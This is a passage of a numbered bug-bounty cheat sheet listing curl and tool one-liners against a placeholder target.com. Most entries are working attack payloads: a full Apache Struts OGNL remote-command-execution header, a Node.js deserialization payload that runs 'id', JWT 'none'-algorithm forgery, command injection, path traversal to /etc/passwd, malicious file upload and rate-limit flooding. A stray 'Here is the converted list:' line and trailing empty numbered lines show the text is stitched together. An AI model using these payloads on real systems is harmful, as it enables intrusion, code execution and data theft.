3088 | gobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,aspx
3089 | ```
3090 |
3091 | **Exposed Docker API**
3092 | ```bash
3093 | curl -s http://target.com:2375/containers/json
3094 | ```
3095 |
3096 | **Check for Log Injection**
3097 | ```bash
3098 | curl "https://target.com/login?username=%0a%0dINJECTEDLOG&password=test"
3099 | ```
3100 |
3101 | **Test for Prototype Pollution**
3102 | ```bash
3103 | curl "https://target.com/api?__proto__[polluted]=true"
3104 | ```
3105 |
3106 | **Exposed Backup Files via Common Extensions**
3107 | ```bash
3108 | curl -I https://target.com/index.php~
3109 | ```
3110 |
3111 | **Check for Arbitrary File Read (Java Web Apps)**
3112 | ```bash
3113 | curl -s https://target.com/admin/..;/WEB-INF/web.xml
3114 | ```
3115 |
3116 | **Check for Error-Based SQL Injection**
3117 | ```bash
3118 | curl "https://target.com/product?id=1'"
3119 | ```
3120 |
3121 | **Check for Misconfigured Exposed GitLab/GitHub Pages**
3122 | ```bash
3123 | curl -I https://target.com/.gitlab-ci.yml
3124 | ```
3125 |
3126 | **Find Public S3 Buckets in JavaScript Files**
3127 | ```bash
3128 | curl -s https://target.com/app.js | grep "s3.amazonaws.com"
3129 | ```
3130 |
3131 | **Test for Apache Struts RCE (Legacy)**
3132 | ```bash
3133 | curl -X POST -H "Content-Type: %{(#_=‘multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=‘id’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,‘/c’,#cmd}:{‘/bin/sh’,‘-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}" https://target.com/upload.action
3134 | ```
3135 |
3136 | **Detect Java Deserialization (CommonsCollections)**
3137 | ```bash
3138 | curl -X POST -H "Content-Type: application/x-java-serialized-object" --data-binary @exploit.ser https://target.com/upload
3139 | ```
3140 |
3141 | **Exposed Jenkins Console**
3142 | ```bash
3143 | curl -s https://target.com/script
3144 | ```
3145 |
3146 | **Insecure Cookie Handling Check**
3147 | ```bash
3148 | curl -I https://target.com | grep -i Set-Cookie
3149 | ```
3150 |
3151 | ### 💻 Ultimate Bug Bounty One-Liners - Part 4
3152 |
3153 | **Find API Endpoints Directly from Web Responses**
3154 | ```bash
3155 | curl -s https://target.com | grep -oE 'https?://[^"]+/api/[^"]+' | sort -u
3156 | ```
3157 |
3158 | **Find Hardcoded Secrets in JS Files**
3159 | ```bash
3160 | curl -s https://target.com/app.js | grep -E "apikey|token|password|secret|client_id"
3161 | ```
3162 |
3163 | **Detect GraphQL Endpoints Automatically**
3164 | ```bash
3165 | curl -I https://target.com/graphql
3166 | ```
3167 |
3168 | **Test for Insecure Deserialization via JSON**
3169 | ```bash
3170 | curl -X POST https://target.com/api/v1/process -H "Content-Type: application/json" -d '{"user":"_$$ND_FUNC$$_function(){require(\"child_process\").exec(\"id\")}()"}'
3171 | ```
3172 |
3173 | **Detect AWS Keys Leaked in Source**
3174 | ```bash
3175 | curl -s https://target.com/app.js | grep -E "AKIA[0-9A-Z]{16}"
3176 | ```
3177 |
3178 | **Check for Insecure Direct Object Reference (IDOR)**
3179 | ```bash
3180 | curl "https://target.com/api/v1/users/1234" -b "session=your_cookie_here"
3181 | ```
3182 | *Change 1234 to 1233 or 1235 and see if you access other user data.*
3183 |
3184 | **Test for JWT None Algorithm Vulnerability**
3185 | ```bash
3186 | echo '{"alg":"none","typ":"JWT"}' | base64 | tr -d '=' | tr '/+' '_-' | tr -d '\n' | xargs -I % curl -H "Authorization: Bearer %.eyJ1c2VyIjoiYWRtaW4ifQ." https://target.com/api/private
3187 | ```
3188 |
3189 | **Find Sensitive Pages via Archive.org**
3190 | ```bash
3191 | curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | grep -E "backup|admin|.sql|.env|.git"
3192 | ```
3193 | Here is the converted list:
3194 |
3195 | **Test for Server-Side Request Forgery (Advanced)**
3196 | ```bash
3197 | curl "https://target.com/api/fetch?url=http://burpcollaborator.net"
3198 | ```
3199 |
3200 | **Auto-Scan for CVEs (Nuclei FTW)**
3201 | ```bash
3202 | nuclei -u https://target.com -t cves/
3203 | ```
3204 |
3205 | **Detect Prototype Pollution in Query Strings**
3206 | ```bash
3207 | curl "https://target.com/api?__proto__[exploit]=polluted"
3208 | ```
3209 |
3210 | **Test for Cache Poisoning**
3211 | ```bash
3212 | curl -H "X-Forwarded-Host: evil.com" https://target.com
3213 | ```
3214 |
3215 | **Find Misconfigured S3 Buckets via Subdomains**
3216 | ```bash
3217 | host -t cname files.target.com | grep amazonaws
3218 | ```
3219 |
3220 | **Check for HTTP Parameter Pollution (HPP)**
3221 | ```bash
3222 | curl "https://target.com/login?user=admin&user=guest"
3223 | ```
3224 |
3225 | **Test for Open S3 Buckets Directly**
3226 | ```bash
3227 | aws s3 ls s3://target-bucket-name --no-sign-request
3228 | ```
3229 |
3230 | **Search for Exposed GitHub Tokens in Source**
3231 | ```bash
3232 | curl -s https://target.com/app.js | grep -E 'ghp_[a-zA-Z0-9]{36}'
3233 | ```
3234 |
3235 | **Test for Business Logic Bypass (Rate Limit)**
3236 | ```bash
3237 | for i in {1..100}; do curl -X POST https://target.com/api/v1/reset-password; done
3238 | ```
3239 |
3240 | **Detect Information Disclosure via Debug Headers**
3241 | ```bash
3242 | curl -I https://target.com | grep -i "debug\|x-powered-by\|server"
3243 | ```
3244 |
3245 | **Detect Unsafe Cross-Origin Resource Sharing (CORS)**
3246 | ```bash
3247 | curl -I -H "Origin: https://evil.com" https://target.com
3248 | ```
3249 |
3250 | **Auto-Find Secrets in Git Repos (GitLeaks)**
3251 | ```bash
3252 | gitleaks detect --source=https://github.com/target/repo.git
3253 | ```
3254 |
3255 | **Detect Open Redirect via Path Injection**
3256 | ```bash
3257 | curl "https://target.com/redirect?next=//evil.com"
3258 | ```
3259 |
3260 | **Find Subdomain Takeover with Subfinder + Nuclei**
3261 | ```bash
3262 | subfinder -d target.com | nuclei -t takeover/
3263 | ```
3264 |
3265 | **Test for SOAP Injection (If SOAP API Detected)**
3266 | ```bash
3267 | curl -X POST https://target.com/soap -d '<?xml version="1.0"?><soap:Envelope><soap:Body><exploit><![CDATA[1 or 1=1]]></exploit></soap:Body></soap:Envelope>'
3268 | ```
3269 |
3270 | **Detect Weak JWT Secrets (Bruteforce)**
3271 | ```bash
3272 | jwt-tool eyJhbGciOiJ... --brute --wordlist=/usr/share/wordlists/rockyou.txt
3273 | ```
3274 |
3275 | **Exposed ENV Files via .env**
3276 | ```bash
3277 | curl -s https://target.com/.env
3278 | ```
3279 |
3280 | **Check for Cloud Metadata Exposure (AWS/GCP/Azure)**
3281 | ```bash
3282 | curl -H "Host: 169.254.169.254" https://target.com
3283 | ```
3284 |
3285 | **Detect Command Injection via Parameter Fuzzing**
3286 | ```bash
3287 | curl 'https://target.com/ping?ip=127.0.0.1;id'
3288 | ```
3289 |
3290 | **Test for Fast Redirect Bypass (Open Redirect)**
3291 | ```bash
3292 | curl "https://target.com/redirect?url=//evil.com"
3293 | ```
3294 |
3295 | **Detect Path Traversal in Parameters**
3296 | ```bash
3297 | curl "https://target.com/api/v1/files?path=../../../../etc/passwd"
3298 | ```
3299 |
3300 | **Look for Exposed Kubernetes Dashboard**
3301 | ```bash
3302 | curl -I https://target.com/k8s/
3303 | ```
3304 |
3305 | **Find Rate Limit Issues in Password Reset API**
3306 | ```bash
3307 | seq 1 100 | xargs -I % -P 20 curl -X POST https://target.com/api/v1/reset
3308 | ```
3309 |
3310 | **Test HTTP Smuggling with CRLF Injection**
3311 | ```bash
3312 | printf "GET / HTTP/1.1\r\nHost: target.com\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nG\r\n\r\n" | nc target.com 80
3313 | ```
3314 |
3315 | **Detect Client-Side Storage Leaks (localStorage/sessionStorage)**
3316 | ```bash
3317 | curl -s https://target.com/app.js | grep -i "localStorage\|sessionStorage"
3318 | ```
3319 |
3320 | **Check for Blind SSRF via PDF Generation**
3321 | ```bash
3322 | curl -X POST https://target.com/api/generate-pdf -d '{"url":"http://your-collaborator.burpcollaborator.net"}'
3323 | ```
3324 |
3325 | **Test for Misconfigured CSP (Content Security Policy)**
3326 | ```bash
3327 | curl -I https://target.com | grep -i "content-security-policy"
3328 | ```
3329 |
3330 | **Detect Unauthenticated Admin Panels**
3331 | ```bash
3332 | curl -I https://target.com/admin/
3333 | ```
3334 |
3335 | **Check for Web Cache Deception**
3336 | ```bash
3337 | curl -I https://target.com/logout.jpg
3338 | ```
3339 |
3340 | **Look for Backup Files Exposed**
3341 | ```bash
3342 | curl -I https://target.com/config.php.bak
3343 | ```
3344 |
3345 | **Scan for Parameter Pollution (HPP)**
3346 | ```bash
3347 | curl "https://target.com/api?user=admin&user=guest"
3348 | ```
3349 |
3350 | **Detect JWT Injection**
3351 | ```bash
3352 | curl -H "Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoibWVAdmUuY29tIn0." https://target.com/api/user
3353 | ```
3354 |
3355 | **Check for Broken Object Level Authorization (BOLA)**
3356 | ```bash
3357 | curl "https://target.com/api/v1/orders/1001" -b "session=your-cookie"
3358 | ```
3359 | Change 1001 to 1002, 1003 and see if you can access others' data.
3360 |
3361 | **Test for Insecure Redirect via Referer Header**
3362 | ```bash
3363 | curl -H "Referer: https://evil.com" https://target.com
3364 | ```
3365 |
3366 | **Identify Leaked API Documentation**
3367 | ```bash
3368 | curl -s https://target.com/api/docs/
3369 | ```
3370 |
3371 | **Test for GraphQL Batch Query Abuse**
3372 | ```bash
3373 | curl -X POST https://target.com/graphql -d '{"query":"{user(id:1) {name} user(id:2) {name} user(id:3) {name}}"}'
3374 | ```
3375 |
3376 | **Find Misconfigured CORS (Advanced)**
3377 | ```bash
3378 | curl -I -H "Origin: https://evil.com" https://target.com
3379 | ```
3380 |
3381 | **Check for WebSockets Injection**
3382 | ```bash
3383 | wscat -c ws://target.com/socket
3384 | ```
3385 |
3386 | **Search for Backup Directories in Wayback**
3387 | ```bash
3388 | curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | grep -iE "\.bak|\.old|\.zip"
3389 | ```
3390 |
3391 | **Find Laravel .env Exposure**
3392 | ```bash
3393 | curl -s https://target.com/.env
3394 | ```
3395 |
3396 | **Detect Exposed Debug Pages (Laravel, Symfony, etc)**
3397 | ```bash
3398 | curl -I https://target.com/_profiler/
3399 | ```
3400 |
3401 | **Check for Misconfigured Proxy Headers (IP Spoofing)**
3402 | ```bash
3403 | curl -H "X-Forwarded-For: 127.0.0.1" https://target.com/admin/
3404 | ```
3405 |
3406 | **Look for API Key in Mobile App Files**
3407 | ```bash
3408 | curl -s https://target.com/app.apk | strings | grep -i "apikey\|token"
3409 | ```
3410 |
3411 | **Scan for WAF Bypass via Encoding**
3412 | ```bash
3413 | curl --path-as-is "https://target.com/%2e%2e/%2e%2e/admin/"
3414 | ```
3415 |
3416 | **Test for Host Header Injection**
3417 | ```bash
3418 | curl -H "Host: evil.com" https://target.com
3419 | ```
3420 |
3421 | **Look for S3 Bucket Leaks in JS**
3422 | ```bash
3423 | curl -s https://target.com/app.js | grep -i "s3.amazonaws.com"
3424 | ```
3425 |
3426 | **Detect File Upload Vulnerabilities**
3427 | ```bash
3428 | curl -F "file=@evil.php" https://target.com/upload
3429 | ```
3430 |
--------------------------------------------------------------------------------
16 |
17 |
18 | 
19 |
20 |
21 | 
22 |
23 |
24 | 
25 |
26 |
27 | 
28 |
29 |
30 | 
31 |
32 |
33 | 
34 |
35 |